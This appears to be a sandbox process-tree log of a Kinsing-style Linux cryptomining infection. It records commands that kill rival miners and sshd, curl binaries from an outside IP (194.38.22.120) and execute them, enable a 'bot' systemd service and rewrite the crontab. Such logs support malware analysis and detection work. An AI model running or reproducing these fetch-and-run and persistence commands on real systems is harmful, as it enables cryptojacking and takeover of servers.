/usr/sbin/sendmailsendmail -t3⤵PID:1438
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGWH-0000NC-Jr4⤵
- Reads CPU attributes
PID:1452
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1441
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGWH-0000NF-Jq4⤵
- Reads CPU attributes
PID:1451
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1442
-
-
-
/usr/bin/idid -u2⤵PID:1443
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1444
-
-
/bin/unameuname -m2⤵PID:1445
-
-
/bin/lsls -la /etc/data2⤵PID:1447
-
-
/bin/grepgrep -e /dev2⤵PID:1448
-
-
/bin/grepgrep -v grep2⤵PID:1449
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1450
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1453
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1455
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads runtime system information
PID:1456
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1457
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1458
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1461
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/bin/grepgrep :14142⤵PID:1464
-
-
/bin/grepgrep -v -2⤵PID:1467
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1468
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1466
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1465
-
-
/bin/grepgrep -v grep2⤵PID:1471
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1472
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1470
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1473
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1469
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1474
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1478
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1477
-
-
/bin/grepgrep stratum2⤵PID:1475
-
-
/bin/grepgrep -v grep2⤵PID:1476
-
-
/bin/grepgrep -v grep2⤵PID:1481
-
-
/bin/grepgrep Sofia2⤵PID:1480
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1482
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1483
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1479
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1484
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1488
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1489
-
-
/bin/grepgrep tracepath2⤵PID:1486
-
-
/bin/grepgrep -v grep2⤵PID:1487
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1485
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1493
-
-
/bin/grepgrep /dot2⤵PID:1491
-
-
/bin/grepgrep -v grep2⤵PID:1492
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1494
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1498
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1499
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1496
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1503
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1501
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1504
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1500
-
-
/bin/grepgrep -v grep2⤵PID:1507
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1508
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1509
-
-
/bin/grepgrep "bash -k"2⤵PID:1506
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1505
-
-
/bin/grepgrep -v grep2⤵PID:1512
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1513
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1514
-
-
/bin/grepgrep perfctl2⤵PID:1511
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1510
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1515
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1516
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1520
-
-
/bin/grepgrep -v grep2⤵PID:1519
-
-
/bin/grepgrep ./ll12⤵PID:1518
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1521
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1517
-
-
/bin/grepgrep agetty2⤵PID:1523
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1522
-
-
/bin/grepgrep -v grep2⤵PID:1524
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1526
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
PID:1527
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1531
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1530
-
-
/bin/grepgrep 207.38.87.62⤵PID:1529
-
-
/bin/grepgrep -v -2⤵PID:1532
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1533
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1536
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1535
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1537
-
-
/bin/grepgrep -v -2⤵PID:1538
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1539
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1543
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1542
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1541
-
-
/bin/grepgrep -v -2⤵PID:1544
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1545
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1547
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1548
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1549
-
-
/bin/grepgrep -v -2⤵PID:1550
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1551
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1554
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1555
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1553
-
-
/bin/grepgrep -v -2⤵PID:1556
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1557
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1558
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1559
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads runtime system information
PID:1560
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1561
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1562
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1563
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
PID:1564
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1567
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1568
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1569
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1570
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1571
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1573
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1577
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/bin/grepgrep -v grep2⤵PID:1587
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1588
-
-
/bin/grepgrep ./udp2⤵PID:1586
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1589
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1585
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1592
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1591
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1593
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1595
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1594
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1596
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1598
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1597
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1599
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1600
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1602
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1604
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1603
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1605
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1607
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1606
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1608
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1609
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1610
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1616
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1615
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1617
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1619
-
-
/bin/catcat /data/./oka.pid2⤵PID:1618
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1620
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1621
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1625
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1624
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1626
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1627
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1628
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
PID:1629
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1630
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1631
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1632
-
-
/bin/grepgrep ./oka2⤵PID:1634
-
-
/bin/grepgrep -v grep2⤵PID:1635
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1633
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1636
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1637
-
-
/bin/grepgrep -v grep2⤵PID:1640
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1641
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1639
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1642
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1638
-
-
/bin/grepgrep -v "\\["2⤵PID:1646
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1644
-
-
/bin/grepgrep -v bin2⤵PID:1645
-
-
/bin/grepgrep -v "("2⤵PID:1647
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1643
-
-
/bin/grepgrep -v php-fpm2⤵PID:1648
-
-
/bin/grepgrep -v proxymap2⤵PID:1649
-
-
/bin/grepgrep -v postgres2⤵PID:1650
-
-
/bin/grepgrep -v postgrey2⤵PID:1651
-
-
/bin/grepgrep -v kinsing2⤵PID:1652
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1653
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1654
-
-
/bin/grepgrep -v bin2⤵PID:1657
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1656
-
-
/bin/grepgrep -v "\\["2⤵PID:1658
-
-
/bin/grepgrep -v "("2⤵PID:1659
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1655
-
-
/bin/grepgrep -v proxymap2⤵PID:1661
-
-
/bin/grepgrep -v php-fpm2⤵PID:1660
-
-
/bin/grepgrep -v postgres2⤵PID:1662
-
-
/bin/grepgrep -v postgrey2⤵PID:1663
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1664
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1665
-
-
/bin/grepgrep -v bin2⤵PID:1668
-
-
/bin/grepgrep -v "\\["2⤵PID:1669
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1667
-
-
/bin/grepgrep -v "("2⤵PID:1670
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1666
-
-
/bin/grepgrep -v php-fpm2⤵PID:1671
-
-
/bin/grepgrep -v proxymap2⤵PID:1672
-
-
/bin/grepgrep -v postgres2⤵PID:1673
-
-
/bin/grepgrep -v postgrey2⤵PID:1674
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1675
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1676
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1679
-
-
/bin/grepgrep -v grep2⤵PID:1678
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1681
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1677
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1685
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1684
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1686
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1688
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1689
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1693
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1692
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1696
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1697
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1699
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1700
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1703
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1704
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1706
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1710
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1712
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1713
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1715
-
-
/usr/bin/idid -u2⤵PID:1717
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1718
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1731
-
-
/bin/sedsed /base64/d2⤵PID:1736
-
-
/usr/bin/crontabcrontab -l2⤵PID:1735
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1737
-
-
/bin/sedsed /_cron/d2⤵PID:1739
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1740
-
-
/usr/bin/crontabcrontab -l2⤵PID:1738
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1743
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1742
-
-
/usr/bin/crontabcrontab -l2⤵PID:1741
-
-
/bin/sedsed /update.sh/d2⤵PID:1745
-
-
/usr/bin/crontabcrontab -l2⤵PID:1744
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1746
-
-
/bin/sedsed /logo4/d2⤵PID:1748
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1749
-
-
/usr/bin/crontabcrontab -l2⤵PID:1747
-
-
/bin/sedsed /logo9/d2⤵PID:1751
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1752
-
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:1750
-
-
/bin/sedsed /logo0/d2⤵PID:1754
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1755
-
-
/usr/bin/crontabcrontab -l2⤵PID:1753
-
-
/bin/sedsed /logo/d2⤵PID:1757
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1758
-
-
/usr/bin/crontabcrontab -l2⤵PID:1756
-
-
/bin/sedsed /tor2web/d2⤵PID:1760
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1761
-
-
/usr/bin/crontabcrontab -l2⤵PID:1759
-
-
/bin/sedsed /jpg/d2⤵PID:1763
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1764
-
-
/usr/bin/crontabcrontab -l2⤵PID:1762
-
-
/bin/sedsed /png/d2⤵PID:1766
-
-
/usr/bin/crontabcrontab -l2⤵PID:1765
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1767
-
-
/bin/sedsed /tmp/d2⤵PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1770
-
-
/usr/bin/crontabcrontab -l2⤵PID:1768
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1773
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1776
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1774
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1779
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1782
-
-
/bin/sedsed /pastebin/d2⤵PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵PID:1780
-
-
/bin/sedsed /onion/d2⤵PID:1784
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1785
-
-
/usr/bin/crontabcrontab -l2⤵PID:1783
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1787
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1788
-
-
/usr/bin/crontabcrontab -l2⤵PID:1786
-
-
/bin/sedsed /shuf/d2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1789
-
-
/bin/sedsed /ash/d2⤵PID:1793
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1792
-
-
/bin/sedsed /mr.sh/d2⤵PID:1796
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1797
-
-
/usr/bin/crontabcrontab -l2⤵PID:1795
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1799
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1800
-
-
/usr/bin/crontabcrontab -l2⤵PID:1798
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1805
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1806
-
-
/usr/bin/crontabcrontab -l2⤵PID:1804
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1808
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1809
-
-
/usr/bin/crontabcrontab -l2⤵PID:1807
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1811
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1812
-
-
/usr/bin/crontabcrontab -l2⤵PID:1810
-
-
/bin/sedsed /github/d2⤵PID:1814
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:1815
-
-
/usr/bin/crontabcrontab -l2⤵PID:1813
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1817
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1818
-
-
/usr/bin/crontabcrontab -l2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1819
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1820
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1823
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1824
-
-
/usr/bin/crontabcrontab -l2⤵PID:1822
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1826
-
-
/usr/bin/crontabcrontab -l2⤵PID:1825
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1827
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1829
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1830
-
-
/usr/bin/crontabcrontab -l2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1833
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1831
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1835
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1836
-
-
/usr/bin/crontabcrontab -l2⤵PID:1834
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1838
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1839
-
-
/usr/bin/crontabcrontab -l2⤵PID:1837
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1841
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1842
-
-
/usr/bin/crontabcrontab -l2⤵PID:1840
-
-
/bin/sedsed /update.sh/d2⤵PID:1844
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1845
-
-
/usr/bin/crontabcrontab -l2⤵PID:1843
-
-
/bin/sedsed /systemd-service.sh/d2⤵PID:1847
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1848
-
-
/usr/bin/crontabcrontab -l2⤵PID:1846
-
-
/bin/sedsed /pg_stat.sh/d2⤵PID:1850
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1851
-
-
/usr/bin/crontabcrontab -l2⤵PID:1849
-
-
/bin/sedsed /sleep/d2⤵PID:1853
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1854
-
-
/usr/bin/crontabcrontab -l2⤵PID:1852
-
-
/bin/sedsed /oka/d2⤵PID:1856
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1857
-
-
/usr/bin/crontabcrontab -l2⤵PID:1855
-
-
/bin/sedsed /linux1213/d2⤵PID:1859
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1860
-
-
